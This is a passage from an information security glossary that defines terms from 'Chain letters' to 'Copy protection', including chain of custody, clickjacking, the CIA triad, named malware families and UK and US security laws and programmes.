chain letters sometimes gain false respectability as a result of being passed
on, and effectively endorsed, by trusted
but foolish intermediaries.
|
|
Chainmail
|
Flexible but heavy body armour constructed from interlocking
steel rings, guarding against glancing blows. Supplemented by armour plates,
shields and helmets protecting the most vulnerable areas of the body against
direct hits and penetration by weapons.
|
|
Chain
of custody
|
Maintenance of a complete, accurate and trustworthy record of the physical
custody and treatment of forensic
evidence at every point between its original collection and
eventual presentation in court, such that there is no reasonable doubt as to
its origin, authenticity
and integrity.
“Demonstrable possession, movement, handling and location of material from
one point in time until another” (ISO/IEC 27050-1).
|
|
Challenge
|
(a) Pose a question intended to raise or dispel doubt or
concern, or to elicit a strong reaction, for example a lawyer cross-examining
a witness in court. (b) Something difficult to overcome or complete
successfully.
|
|
Challenge-response
|
Protocol
or process in
which the respondent has to provide the correct, anticipated response or credential,
otherwise the challenger knows something is amiss. Mediaeval gatekeepers
demanded “Who goes there?” in anticipation of a visitor revealing the secret pass word to authenticate
themselves and be allowed to pass through a gate. Nowadays used to establish network
communications by confirming that a counterparty holds the correct private key without actually disclosing the key
over the network, typically by having them encrypt and return a nonce supplied by the challenger who can
then decrypt the
response with the respondent’s public
key to verify that the respondent does in fact hold the
corresponding private key (a zero knowledge approach).
|
|
CHAMP
(Counter-electronics High-powered microwave
Advanced Missile Project)
|
Boeing EMP
cyberweapon
which directs intense bursts of electromagnetic energy at selected target buildings
(and perhaps vehicles and other cyberweapons) from a passing aircraft or drone in order to
destroy/disable the electronic systems,
devices, IT systems and network
infrastructure within.
|
|
Chance
|
See probability.
|
|
Change
control
|
Management
process for
proposing, reviewing
and accepting or rejecting changes to a process, system and/or the associated documentation.
Part of change
management.
|
|
Change
key
|
Conventional physical locks are designed to be unlocked only by keys having the
corresponding patterns, keys which will not open locks of other patterns:
these single-lock keys are known by locksmiths as change keys. Cf. master keys.
|
|
Change
management
|
The totality of activities used to plan, risk-assess,
authorize, control, direct, document changes
to the organisation,
and its IT systems,
business processes,
products etc.
|
|
Chatham
House rule
|
An informal arrangement (a gentleman’s agreement) to
protect the anonymity
of information
sources at meetings. “When a meeting, or part thereof, is held under the
Chatham House Rule, participants are free to use the information received,
but neither the identity nor the affiliation of the speaker(s), nor that of any
other participant, may be revealed” [Chatham House].
|
|
Cheat
|
A dishonest
person who deliberately bends or breaks the rules for personal gain. A relatively
minor fraud.
|
|
Checkpoint
|
(a) A static record or snapshot of the state of a computer
system, program, database etc. at
one point in time to which the system may be rolled-back if necessary. See
also backup. (b)
A physical
guard house or similar place manned by security guards through which people must
pass some sort of inspection (e.g. checking ID cards, metal detectors).
|
|
Checks and balances
|
The reconciliation
of accounts or data
files compiled separately but supposed to match item-for-item, for example in
double-entry
bookkeeping every credit should correspond to an equal and
opposite debit, hence the total of a debit account should precisely equal the
total of the matching credit account.
|
|
ChewBacca
|
One of several species
of memory-scraping
malware in the
wild.
|
|
Chief Security
Officer
(CSO)
|
Director or senior/executive manager with overall responsibility
for security, including physical
security and perhaps information
security. Chairs the Security Committee and reports to executive management.
See also CISO.
|
|
Chinese
wall,
paper wall
|
Notional physical isolation or air-gap separation between people,
business functions/departments/units, organisations, networks, systems etc. intended to prevent
the inappropriate passage of confidential information between them, avoid conflicts of
interest and/or maintain divisions of responsibility.
|
|
Chip-n-PIN,
chip and PIN,
chip card
|
Physically
secure payment, charge, store, bank, credit, debit or EFTPOS card
containing an embedded cryptographic
module – in practice, a small integrated circuit laminated within
the card. Compared to magnetic stripe cards, it is extremely difficult for forgers to duplicate
well-designed and
implemented cryptographic modules due to their physical and logical security
controls. Normally, the user
must enter their correct PIN
code into the chip-n-PIN card reader to authenticate themselves and ‘unlock’ the
card (multi-factor
authentication), further controlling against loss or theft of the
card provided neither the card reader nor the PIN code have been compromised (two
known modes of attack).
|
|
Chipzilla
|
See meltdown.
|
|
Chosen
plaintext
|
Cryptanalytic
technique in which the analyst can obtain the cyphertext corresponding to some plaintext of his
choosing, which acts as a crib.
See also known
plaintext.
|
|
Christmas
tree
|
One of the earliest network worms, released in 1987. Less damaging
than The Internet
Worm.
|
|
CIA
(Central Intelligence Agency)
|
Spooky
US government agency responsible for overseas intelligence and intelligence on
foreigners, relating to illegal drugs, arms trafficking, terrorism etc. See also FBI and DHS.
|
|
CIA
triad
|
The primary objective
of information security
is to protect information
assets against the compromise
of their Confidentiality, Integrity
and Availability (CIA). In addition to those
three, other objectives may also be relevant under various circumstances e.g. assurance, auditability, accountability,
non-repudiation
and compliance.
Cf. Parkerian
hexad.
|
|
Cipher
|
A message written in a secret code, or the mechanism for
generating it. See algorithm.
|
|
Circumstantial evidence
|
Forensic
evidence that is peripheral, implicated or related in some
indirect way with an incident,
requiring inference to make the association. Cf. direct evidence.
|
|
CIRT
|
See CERT.
|
|
CISA
(Certified Information Systems Auditor)
|
The preeminent qualification for ICT auditors worldwide, issued by ISACA.
|
|
CISA
(Cybersecurity Information Sharing
Act)
|
US law to encourage the sharing of cyberthreat indicators between US corporations and
the US government by limiting their liabilities in so doing.
|
|
CISO
(Chief Information Security Officer)
|
Executive
with overall responsibility
for the governance
and management
of information
risks. See also CSO
and ISM. “A
senior executive who is responsible for coordinating communication between
security, ICT and business functions as well as overseeing the application of
controls and security risk management processes within an agency” (NZ information Security Manual).
|
|
Citadel
|
RAT
generated using the Zeus
crimeware kit
installs a remotely-configurable botnet
to mount various attacks.
|
|
Citizen programmer
|
Largely untrained and self-taught amateur software developer
who writes spreadsheets, macros, utilities, databases, custom reports and/or other
programs more as a hobby interest than a profession. See also End User Computing.
|
|
Claim
|
Assertion
or verifiable
statement of fact e.g. a patent claim defines possible
applications of an invention protected by the patent; an insurance claim is an application by an
insured party for compensation under the policy as a result of an insured event; manufacturers’
claims regarding their products (goods and services) may include information security,
privacy and
other features and strengths.
|
|
Clark-Wilson
model
|
Formal model or
architecture developed by David D. Clark and David R. Wilson in 1987 elaborates on the Biba model to protect the integrity of information in general, not just computer data.
|
|
Class,
classify, classification
|
Pragmatic grouping-together of similar or related information assets
that are believed to share similar risks
and hence control
requirements. While classification is a quick process that reduces the need
individually to risk
assess and identify security controls needed to protect every single asset in each class, the appropriate
generic controls still need to be applied. Furthermore, generic controls may
not be ideal for a specific situation, hence higher classes may require more
intense risk analysis
and bespoke controls. Classification typically involves confidentiality
or privacy
criteria but more complex schemes may also take account of integrity and availability
requirements. Unfortunately, there is no universal agreement on
classification labels and their meanings, hence in addition to the compliance
issues within any organisation
there are additional risks of misinterpretation leading to inadequate
or inappropriate security when classified materials are shared between organisations.
|
|
Classified information
|
“Government information that requires protection from
unauthorised disclosure” (NZ information Security Manual).
|
|
Classified systems
|
“Systems that process, store or communicate classified
information” (NZ information Security Manual).
|
|
Clear
|
A basic low-assurance
form of sanitisation.
“Sanitize using logical techniques on data in all user-addressable storage
locations for protection against simple non-invasive data recovery techniques
using the same interface available to the user” (ISO/IEC 27040).
|
|
Cleartext
|
See plaintext.
|
|
Click
bait, click-bait, clickbait
|
Something attractive or intriguing (such as fake news and
scantily clad people) that lures unsuspecting computer users to click a link, open an
attachment, install or run a program or whatever, leading typically to their devices being infected with malware and/or
their being defrauded
or otherwise compromised.
A form of social
engineering. The thriving underground market in clickbait pays a
premium for clickbait pages with tens or hundreds of thousands of visitors,
especially affluent Westerners.
|
|
Click
fraud
|
Fraud
techniques targeting
click-through affiliate marketing schemes that pay a bounty for visitors’
clicks. In one form, malware
surreptitiously swaps genuine affiliate codes embedded in URLs and cookies
for codes to the fraudsters’
own accounts. In another, malware racks up large pay-per-click charges
and/or artificially inflates website reputational ratings (and hence
commercial value) by ‘clicking’ online advertisements.
|
|
Clickjacking
|
Hacking
technique that surreptitiously an unexpectedly diverts visitors’ browsers to
a different website, typically then launching malware attacks against visitors’ ICT devices. See also click fraud.
|
|
Click-regret
|
The sinking feeling that follows an unwise click on a
dubious link, app,
attachment or security warning message.
|
|
Clipper
chip
|
Failed US government initiative in the mid-1990s to
introduce a cryptographic
subsystem on a proprietary computer chip using Skipjack with cryptographic keys recoverable by the authorities,
allowing them to decrypt
data at will.
Aside from flaws in
the cryptographic design,
introducing additional security vulnerabilities, and the obvious trust, privacy and oversight issues
relating to key escrow
and surveillance,
black hats
would simply avoid Clipper thus negating its alleged purpose. The project’s
incredible naïveté hints at ulterior motives: the real goal might have
been to raise awareness
of the social issues arising from the use of strong encryption, particularly by criminals and
terrorists.
Side-effects included stimulating the dissemination and use of other strong
encryption systems,
and a backlash against invasions of privacy by the authorities.
|
|
Clone,
cloning
|
Controlled
security devices
such as authentication
tokens and passes, keys, virtual systems,
databases, programs etc.
are vulnerable
to being duplicated/copied illicitly unless there are adequate preventive
and/or detective
controls. They may also be cloned for legitimate reasons such as backups, business continuity,
disaster recovery,
hardware replacement, testing or forensic purposes.
|
|
Close call, close shave,
dodging the bullet
|
See near
miss.
|
|
CLOUD
(Clarifying Lawful Overseas Use of Data)
Act
|
Another US law with a contrived name, this one concerning
requests to the US by foreign organisations for intercepted data. Provisions in the law are intended
to authorize
and facilitate appropriate requests for legitimate law enforcement purposes but block inappropriate
disclosures.
|
|
Cloud
bursting
|
Capacity
management technique whereby private cloud services temporarily
utilize public cloud
services to handle peaks in demand.
|
|
Cloud
computing,
cloud services,
cloud computing services,
cloud
|
Provision of distributed, network-based information processing services within a Service
Oriented Architecture typically giving ‘access from anywhere’ (meaning users typically only
need a compatible browser and network connection) and service elasticity or
flexibility (adjusting performance
by dynamically allocating capacity
behind-the-scenes from pooled resources using the CSP’s automated systems- and network-management processes). However, cloud computing can
raise governance,
ownership, compliance and
other information security
and privacy
issues.
|
|
CloudCracker
|
This cloud-based commercial service offered to crack by brute force attack on the NT hash values used as
part of the PPTP (Point to Point Tunnelling Protocol)
and MS-CHAP cryptographic
processes.
|
|
Cloud
Smart
|
The common name of a US government federal strategy on cloud computing,
including the commercial, information
security and other aspects. A 2018 update to Cloud First, the
original strategy from 2010.
|
|
Cloud
storage,
Web storage,
online storage
|
Facility to access
remotely stored data
through the Internet.
As with cloud
computing, the geographical storage location is unknown to the user which can raise governance, ownership, compliance and
other information security
and privacy
issues, while the involvement of external organisations and network communications may expose proprietary data
to various risks
including unauthorized
access, corruption
and denial of
service.
|
|
Cluster
|
Two or more closely-coupled computer servers configured to appear as a single
operating unit, sharing the processing
load and (usually) disks. Can provide higher availability/resilience and performance than a single computer,
albeit with additional costs, complexity and associated constraints.
|
|
Cluster
of PII
|
“PII which is processed for a consistent functional
purpose. Note: Clusters of PII are described independent from technical
representation of data objects. On a regular basis, the clusters of PII also
include PII which is not stored electronically” (ISO/IEC 27555 draft).
|
|
CME
(Common Malware Enumeration)
|
Process run by MITRE to assign a common ID to new malware that may
otherwise be identified/named independently by several antivirus companies or malware analysts,
causing confusion.
|
|
CMMC
(Cybersecurity Maturity Model
Certificate)
|
US Department of Defense cybersecurity assurance scheme for assessing/auditing
and rating defense suppliers between “Basic Cybersecurity Hygiene” and
“Advanced” levels, according to the nature and quality of the cybersecurity
controls they are operating, in order to protect CUI as it is passed through supply chains.
|
|
CNSSI-4009
|
US Committee on National Security Systems Instruction
№ 4009: Glossary.
|
|
Code,
coding,
decoding
|
The use of words, symbols, strings, phrases, sounds or
images to represent and communicate messages. A relatively crude application
of (usually monoalphabetic)
substitution,
rendered somewhat more secure through the use of multiple code books, one-time pads, steganography etc. For example,
“Attack at dawn!” might be represented or signalled by the seemingly
innocuous mention of, say, “native daffodils” at some point in an otherwise legitimate news
broadcast, web page, press release, blog posting, tweet or private ad in the
personal columns of a national newspaper. Codes (such as Morse code, ASCII
and ‘computer code’ meaning program instructions) and obscure languages (such
as Navajo or Cockney) are not necessarily deliberately secretive, cryptic or covert but may
appear so to non-experts.
|
|
Code
book,
codebook
|
If the list of code
words etc. is too long to remember and communicate reliably to those
who need to code or decode
messages, it may be necessary to prepare and distribute one or more lists
from which to lookup codes and their plaintext equivalents. The security
issues are similar to those associated with the generation and distribution
of encryption keys e.g. ensuring
that code books do not fall into enemy hands and cannot simply be
reconstructed by the enemy through educated guesswork or cryptanalysis.
|
|
Code
injection
|
Hacking
techniques to insert malicious
content into programs during their execution, exploiting various operating system and application flaws and bugs, specifically injection flaws.
Used by some malware.
See also AtomBombing,
XSS and HTML injection.
|
|
Code
of ethics
|
A comprehensive set of rules, ideals, objectives, principles, practices and/or values
deemed ethical
by the organisation,
culture
or society. Given that a written code cannot realistically cover all
possible ethical issues, a substantial part inevitably remains unstated:
however, workers
are expected to interpret and apply the guidance sensibly when facing novel
situations and dilemmas,
acting in the best interests of the organisation, culture or society.
|
|
Code
Red
|
A network
worm that infected insecure
unpatched Web servers running
Microsoft IIS software
in 2001. Websites were defaced with “HELLO! Welcome to http://www.worm.com!
Hacked By Chinese!”
|
|
Coercion
|
Assertively
or aggressively forcing someone to do something against their wishes (e.g.
pay a ransom to
recover their data),
typically through physically intimidating, threatening or blackmailing them, putting them under duress.
|
|
Coercivity
|
The magnetic force that will completely demagnetize a
ferromagnetic material such when wiping the data stored on hard disk or mag-stripe
bank card. Measured in Teslas. “A property of magnetic material, used as
a measure of the amount of coercive force required to reduce the magnetic
induction to zero from its remnant state” (NZ information Security Manual).
|
|
Cognitive
systems
|
Advanced IT
systems capable of artificial intelligence and/or machine
learning, augmenting the intellectual capabilities of us humans. While the information risks
associated with cognitive systems may be challenging, they show promise in
the cybersecurity
field, for example intelligent network/system
intrusion, malware and fraud detection,
prevention and response.
|
|
Coinhive
|
One of several species
of cryptominer
malware in the wild in
2018. Infected systems
mined Monero cryptocurrency
for the VXers and
criminals behind the attacks.
|
|
CoinVault
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Uses 256-bit AES.
|
|
Cold
site
|
Secondary location with a minimalist ICT facility that is little more than a
vacant room provided with electrical power and air conditioning. It may take
days, perhaps weeks to bring the site fully into operation in the event of a
disaster taking out the main site, assuming sufficient ICT equipment, data backups, people etc. are available
or can be obtained. This minimalist approach to disaster recovery may be somewhat
faster and less risky than buying or renting suitable accommodation on the
open market and may be appropriate for low-availability ICT services that are definitely not business-critical.
See also warm site,
hot site and mirror site.
|
|
Collection
|
(a) A set or group of related or associated items, such as
data in a database or stamps. (b)
The act or process
of locating and retrieving or gathering materials such as forensic evidence,
intelligence
or, yes, stamps. “Process of gathering the physical items that contain
potential digital evidence” (ISO/IEC 27037).
|
|
Collector,
handler
|
Someone who gathers intelligence on/about or from certain targets, using OSINT, HUMINT, SIGINT, black bag ops, agents and other
sources plus techniques such as deception,
surveillance
and subterfuge.
See also agent and
spy.
|
|
Collusion
|
Conspiracy and collaboration between individuals or organisations
to negate the division
of responsibilities, breach Chinese walls, commit fraud etc.
|
|
Co-location
|
Shared use of commercial data centre facilities by multiple
customers. “Installation of telecommunications facilities on the premises
of other telecommunications carriers” (ISO/IEC 27011).
|
|
Colossus
|
World’s first digital programmable computer, designed by Alan
Turing, Max Newman, Tommy Flowers and colleagues at the UK Government Code
and Cypher School at Bletchley Park North of London in 1943 during World War
II. Although it was programmed mechanically using patch cables and switches,
its sole purpose was to break encrypted
teleprinter messages by brute
force attack
on the keys used on
the German Lorenz cryptographic machines, hence arguably it was not a general-purpose
computer (cf. ENIAC)
but possibly one of the first cyberweapons.
|
|
Combination,
combination code
|
See PIN code.
|
|
Combination
lock
|
Physical
lock that can be
unlocked with the correct combination – normally a short alphanumeric
sequence (a PIN code).
|
|
Command and
Control
(C2, C&C)
|
Generally, systems
and processes
for directing and monitoring
diverse operations. In the hacking
context, C2 normally refers to the covert remote direction and management of malware botnets through the Internet by a bot master. In
the military context, C&C refers to the command structure, lines of
communication etc. used to monitor
and direct operations.
|
|
Comfort
zone
|
The domain within which we feel safe and secure, and
beyond which we feel uncomfortable - possibly threatened and/or vulnerable, in other words at risk.
|
|
COMINT
(COMmunications INTelligence)
|
Spying
on the content and nature of communications to gather useful intelligence information.
Part of SIGINT.
|
|
Commercially confidential,
commercial-in-confidence
|
A class
of business information
whose value to its owner
relies in part on it being withheld from competitors, customers etc.
See also trade secret.
|
|
Commit
point
|
Point at which one or more new, altered or deleted records
is actually recorded in a database.
Well-designed database
systems
incorporate controls
such as locks and control totals
to detect and prevent certain data
integrity incidents
occurring before the commit point, plus journaling and checkpoints to recover from certain
incidents that occur afterwards.
|
|
Common Controls
Hub
(CCH)
|
Commercial service from the Unified Compliance Framework
providing detailed information
on compliance
obligations
and other information
security, privacy,
information risk
management and governance-related
practices (called “controls” within CCH) recommended or required by a wide
variety of standards,
laws and regulations (“authority documents”). By systematically and
painstakingly analysing the sources, they identify common/shared
requirements. CCH clients may potentially save money by implementing common
controls as part of a suite (a security baseline) rather than
individually and perhaps repeatedly to satisfy each compliance obligation
separately.
|
|
Common Criteria
(CC),
Common Criteria for Information
Technology Security Evaluation
|
A formal, internationally-recognized scheme (defined in
ISO 15408) to specify, design,
develop, test, evaluate and certify secure IT systems for government and defence
customers, where ‘secure’ is explicitly and formally defined through TOE, PP, ST, SFRs,
SARs
and EALs. The
scheme distributes the substantial costs across participating organisations
(product vendors and customers) while also improving quality, reducing duplication
and facilitating use of common systems etc. by various nations,
agencies etc.
|
|
Communication
centre
|
“Building where facilities for providing
telecommunications business are sited” (ISO/IEC 27011).
|
|
Communications security (COMSEC)
|
Arrangements to protect the information content of communications,
and possibly associated metadata
(e.g. who is communicating, when, by what routes/mechanisms, and
how much information is exchanged), and to maintain communications routes and
services (e.g. networks
and point-to-point links). Concerns confidentiality, integrity and availability of information and services. “The
measures and controls taken to deny unauthorised personnel information
derived from telecommunications and to ensure the authenticity of such
telecommunications” (NZ information Security Manual).
|
|
Companion
virus
|
Virus
that takes advantage of the operating
system’s prioritisation of file names with certain extensions e.g. a
virus calling itself game.com may be executed in preference to game.exe,
the program the user
intended to run. Companion viruses typically execute covertly then launch the intended program
hoping that the user remains blissfully unaware of the subterfuge.
|
|
Compensating control
|
A control
that is suboptimal but sufficient to mitigate a risk to some extent and/or achieve compliance with
a security obligation
where, for some reason, the ideal control cannot be used. A workaround,
substitute or compromise control that partially or completely addresses
control gaps, weaknesses, failings or constraints elsewhere.
|
|
Competence,
competent
|
Capability
of doing something properly, skilfully
and expertly. “Ability to apply knowledge and skills to achieve intended results”
(ISO/IEC 27000).
Cf. incompetent.
|
|
Competitive [or Competitor] Intelligence
(CI)
|
The term may be explicitly defined to distinguish authentic and ethical means of
gathering information
on competitors (such as collating details from their websites and social media)
from more illicit ones (such as hacking,
social
engineering, physical
site penetration and other industrial espionage techniques).
However, the term is usually undefined, referring implicitly to licit and/or
illicit approaches.
|
|
Complexity
|
Risks
relating to or arising from the sophistication and fragility of complicated
technologies, systems,
processes etc.
generally constrains the level of information
security achieved in practice, although paradoxically the converse
applies in the case of certain controls
such as passwords,
cryptographic keys, cyphertext and locks.
|
|
Compliance
|
Assured
conformance
with information security
objectives, controls etc.
defined internally by the organisation
in policies etc.
and/or externally by third
parties (e.g. laws, industry regulations, standards and contractual
terms). May be independently checked by competent and authorized third parties, for example a certification body.
Also, in some organisations, used as the name of the corporate department or
function overseeing
compliance-related activities.
|
|
Comprehensive National Cybersecurity Initiative
(CNCI)
|
US strategic program to improve the cybersecurity
capabilities of government agencies and critical national infrastructure,
initiated under George W. Bush in 2008. See also the NIST
Cybersecurity Framework.
|
|
Compromise
|
Generally, a deliberate attack that intentionally causes an event or incident.
Sometimes more loosely refers to any situation that bypasses or disables
security controls,
or that threatens
or merely has the potential to harm or weaken an organisation
or individual in some way.
|
|
Compromising emanation
|
US military term for stray electromagnetic radiation from devices that may
inadvertently disclose sensitive information. “Unintentional signal that,
if intercepted and analyzed, would disclose the information transferred,
received, handled, or otherwise processed by any telecommunications or
automated information systems equipment.” (Air Force Air Intelligence, Surveillance and
Reconnaissance Agency instruction 33-203, 2011).
|
|
Computationally infeasible
|
Refers to the likely inability of anyone solving an
extremely tough mathematical challenge using any current or projected
computing technologies, algorithms
or approaches, within a stated timeframe. Implies a risk-based decision since we have
imperfect knowledge of current cryptanalytical methods, vulnerabilities in cryptosystems etc., while
predicting future technological advances is notoriously difficult (aside from
Moore’s Law until about 2025 anyway).
|
|
Computer forensics
|
See digital forensics.
|
|
Computer Misuse
Act
(CMA)
|
UK law criminalizes unauthorized access to a computer, unauthorized computer
access with intent to commit further crime and unauthorized modification of data – in other words hacking and cracking. The law
was enacted in 1990 after Prince Phillip’s mailbox on the Prestel system had been
hacked but the authorities were unable to convict the hackers responsible under extant
legislation (on appeal, they were acquitted of fraud since they did not profit from the
hack).
|
|
Computer Network
Attack (CNA)
|
US military term for offensive cyberwar capability.
|
|
Computer Network
Defense (CND)
|
US military term for defensive cyberwar capability. [In other contexts, CND
refers to the Campaign for Nuclear Disarmament.]
|
|
Computer Network
Exploitation (CNE)
|
US military term for cyberwar reconnaissance/espionage function.
|
|
Computer Network
Operations (CNO)
|
US military term for cyberwar capability comprising Computer Network Exploitation, Computer Network Attack
and Computer Network Defense,
all within Information
Operations.
|
|
Con
|
See fraud.
|
|
Concept
|
One of the first macro viruses dating back to 1995.
|
|
Conduit
|
Tube partially protecting data or power cabling against
physical/mechanical damage, fire,
fluid ingress etc. “A tube, duct or pipe used to protect cables” (NZ information Security Manual).
|
|
Conficker
|
Very prolific network
worm, released in
2008 and still in the
wild in 2016.
|
|
Confidence
trickster,
con-man,
con-artist
|
Someone who uses social engineering techniques such as pretexting and masquerading to
establish false confidence in themselves in order to con, fool, cheat, scam or defraud victims.
|
|
CONFIDENTIAL
|
Commonplace label for a class of information that is sensitive and therefore needs to be protected against unauthorized
or inappropriate access.
It is normally intended for limited distribution within the organisation
or to specially designated third
parties, on a default
deny basis. However, the label and its meaning vary between organisations.
|
|
Confidential Informant
(CI)
|
Law enforcement
term for a spy or mole, either trained
and placed within a target
organisation
as an undercover
agent or recruited
subsequently perhaps through coercion
or other forms of social
engineering.
|
|
Confidentiality,
confidential,
in confidence
|
One of the three core objectives of information security, along with availability
and integrity
(the CIA triad),
confidentiality essentially concerns the secrecy, privacy or sensitivity of information. “Property that
information is not made available or disclosed to unauthorized individuals,
entities, or processes”
(ISO/IEC 27000).
|
|
Configuration Item
(CI)
|
A piece of technology (such as a particular document, piece
of hardware,
source code or compiled program) being managed through the organisation‘s
configuration management
system.
|
|
Configuration Management (CM)
|
A subset of change management activities specifically concerning control over the
configuration of IT systems
and infrastructure, including the parameters or settings and relationships (e.g. a
certain combination of specific versions of the hardware, firmware, operating system and layered software might be
tested thoroughly as a complete system, those test results potentially being
invalidated if changes such as patches
are made to any part).
|
|
Conflict of interest
|
Situation in which a person or organisation’s loyalty is (potentially or
actually) divided between mutually exclusive responsibilities, for example where their
obligations
to a third party
(e.g. to report a security
incident) conflict with their self-interest (e.g. if
disclosing the incident will cause adverse customer reactions or trigger enforcement
actions for noncompliance).
|
|
Conformity,
conformance
|
A low-assurance
form of compliance,
typically asserted
by the subject without independent verification. “Fulfillment of a requirement.
Note: the term ‘conformance’ is synonymous but deprecated.” (ISO/IEC 27000).
|
|
Conformance tester, tester
|
“Individual assigned to perform test activities in
accordance with a given conformance testing standard and associated testing
methodology. An example of such a standard is ISO/IEC 19790 and the testing
methodology specified in ISO/IEC 24759” (ISO/IEC 19896-1:2018).
|
|
Congestion
|
Capacity constraint e.g. through an excessive
volume of traffic on a network.
Typically reduces performance
and increases latency and may lead to timeouts. Whereas congestion is
normally unintentional or accidental,
hackers may
deliberately inject spurious network traffic in order to conceal their
nefarious activities or cause IT
systems to delay/drop critical security event/alert/alarm messages.
|
|
Connection forwarding
|
“The use of network address translation to allow a port
on a network node inside a local area network to be accessed from outside the
network. Alternatively, using a Secure Shell server to forward a Transmission
Control Protocol connection to an arbitrary port on the local host” (NZ information Security Manual).
|
|
ConOp
(Concept of Operation)
|
Describes the principles or mechanisms of operation of a system, control, process etc.
|
|
Consensus Assessment
Initiative Questionnaire
(CAIQ)
|
Crude cloud
computing security checklist from the CSA concerning compliance with the CCM, provided as “a set of questions a
cloud consumer and cloud auditor may wish to ask of a cloud provider … a
simplified distillation of the issues, best practices, and control
specifications from [the CSA’s] Guidance and CCM, intended to help organisations
build the necessary assessment processes for engaging with cloud providers.”
Anticipates simple binary yes/no answers to complex issues, hence (being
cynical) respondents are likely to offer the most flattering responses (a
systematic bias).
|
|
Consent
[of the data subject]
|
“Any freely given, specific, informed and unambiguous
indication of the data subject's wishes by which he or she, by a statement or
by a clear affirmative action, signifies agreement to the processing of
personal data relating to him or her” (GDPR). See also permission and informed consent.
|
|
Consequence
|
The net result or outcome of a cause-effect relationship
when the cause materializes. “Outcome of an event affecting objectives.
Note: an event can lead to a range of consequences; a consequence can be
certain or uncertain and in the context of information security is usually
negative; consequences can be expressed qualitatively or quantitatively;
initial consequences can escalate through knock-on effects.” (ISO Guide 73).
|
|
Console
|
A specially-designated terminal device or port on a system intended for system management
purposes such as displaying events,
alerts and alarms, configuring
the system etc. Due to its privileged nature, the console should be physically secured,
normally by being adjacent to the server,
PABX etc. in a secure access-controlled area. On some systems, users who have been
automatically locked out of other terminals/ports (e.g. as a
result of someone repeatedly trying and failing to enter their passwords) are
still able to logon
at the console, a control
against that particular denial
of service.
|
|
Conspicuous consumption
|
Without a credible explanation for their wealth, fraudsters and
other criminals living the high life on their ill-gotten gains risk being noticed, reported and
investigated by the authorities.
|
|
Contaminate
|
Taint or discredit forensic evidence, for example through
gaps in the chain of
custody or unexplained physical or logical changes.
|
|
Content
filtering
|
“The process of monitoring communications such as email
and web pages, analysing them for suspicious content, and preventing the
delivery of suspicious content to users” (NIST SP800-114 rev1).
|
|
Content Security Policy
|
See CSP.
|
|
Contextual
information, contextual data
|
Metadata
that may provide additional context or supporting information enabling the nature of the
associated data or
information content to be guessed or interpreted more readily.
|
|
Contingency
|
Unanticipated and often inherently unpredictable situation
or information security
incident or disaster (e.g. a
bomb, plane crash, flood
or fire),
logical/technical disaster (e.g. malware outbreak, equipment breakdown, software flaw/bug, hack or similar attack on a major business system or network), business
disaster (e.g. a serious fraud or hostile takeover attempt), which other controls have
failed to prevent. The appropriate responses are contingent (dependent) on
the exact nature of the incident
and the situation in which it occurs.
|
|
Contingency
plan,
contingency management
|
Forward-thinking, flexible approach for preparing and marshalling
the organisation’s
people and other resources to cope as effectively as possible in a contingency
situation such as a major incident
or disaster.
Involves preparing and exercising general purpose plans or preparations (such
as forming a crisis
management team from competent, capable people still available), stocking up on tools and
resources (such as duct tape, walkie-talkies and white boards) and building
capabilities (such as resourcefulness, adaptability and a willingness to ‘go
the extra mile’ and ‘do whatever it takes’) ahead of time. Incidents that
are expected or predictable should be covered by conventional risk management
activities, resilience
controls, disaster recovery plans
etc.
|
|
Continual improvement
|
Determined, conscious effort to mature or get better at
doing something (or at least not to get any worse!) in a systematic, gradual
way. “Recurring activity to enhance performance” (ISO/IEC 27000).
|
|
Continuous Development
(CD)
|
A software
engineering approach involving making frequent small/incremental/evolutionary
changes to a production system
rather than infrequent large/revolutionary changes as in the traditional
‘waterfall’ SDLC.
See also DevOps.
|
|
Contract
|
Binding agreement between two or more parties, for various
strengths of ‘binding’. Formal contracts prepared by qualified lawyers and
signed (‘executed’) by duly authorized
representatives are normally legally binding on the parties but may be
unenforceable (especially any terms deemed ‘unfair’ by the courts or
overridden by laws such as the fair
use provisions of copyright
law). Verbal, informal or presumed contracts may also be legally binding,
although they are usually harder to prove and enforce. If someone breaks the
seal on shrink-wrapped
software, for instance, they may be deemed to have accepted
the license
terms and conditions visible through the clear plastic film, implying a
contractual commitment. ‘Social contract’ refers to ethical commitments between the parties e.g. between
worker and organisation.
Generally speaking, contracts may not be unilaterally imposed (e.g. email disclaimers),
hence a signature
and/or a ‘consideration’ (normally a payment) may be necessary to demonstrate
someone’s willingness to commit.
|
|
Control,
safeguard,
measure,
countermeasure,
protection mechanism
|
[Noun] Something which prevents or reduces the
probability of an information
security incident,
indicates that an incident may have occurred and/or mitigates the damage, harm, costs or other
adverse consequences caused or triggered by or simply following on from an
incident. Some controls mitigate threats
(e.g. deterrents) or impact
(e.g. backups), although most mitigate vulnerabilities. [Verb] To exert
influence over a subordinate by an authority or assertive figure. “Measure that is
modifying risk.
Notes: controls include any process, policy, device, practice, or other
actions which modify risk; controls may not always exert the intended or
assumed modifying effect.” (ISO/IEC 27000).
|
|
Controller
|
“The natural or legal person, public authority, agency
or other body which, alone or jointly with others, determines the purposes
and means of the processing of personal data; where the purposes and means of
such processing are determined by Union or Member State law, the controller
or the specific criteria for its nomination may be provided for by Union or
Member State law” (GDPR).
|
|
Control
objective
|
Describes in business terms the anticipated business
purpose or benefit of an information
security control,
encapsulating the risk
reduction requirement. “Statement describing what is to be
achieved as the result of implementing controls” (ISO/IEC 27000).
|
|
Control Self-Assessment
(CSA)
|
Typically, a regular management review process to assess the status of governance
across the organisation,
including information
security and other forms of risk management and control. May simply involve managers completing
checklists, surveys or questionnaires, possibly then validated by further
independent checks on a sample basis to ensure sufficient integrity in the
responses. Cf. Cloud Security Alliance.
|
|
Control
total
|
A value (such as a grand total or count of the number of
items) that can be used as a simple cross-check for integrity failures on a data set or process. Used for example to confirm
that all records transmitted through an interface were duly received and
processed by a database, before committing the
changes.
|
|
Cookie
|
Small text file sent by a website to your browser and
later retrieved, normally to track or modify your web browsing habits (marketing,
surveillance
and ‘carry on where you left off’ functions). If browser settings permit,
different websites may share the information in cookies, raising privacy and other information security
issues.
|
|
Copyleft
|
 Movement using copyright law, in stark contrast to its
normal application, to permit rather than prevent free access to and
collaborative or community development of intellectual property with the express
requirement that derivative works are covered by the same permissive
conditions. Denoted by an inverted copyright symbol . See also Creative Commons
and GNU General Public
License.
|
|
Copy
protection,
copy prevention
|
Technical controls
typically involving encryption
and dongles,
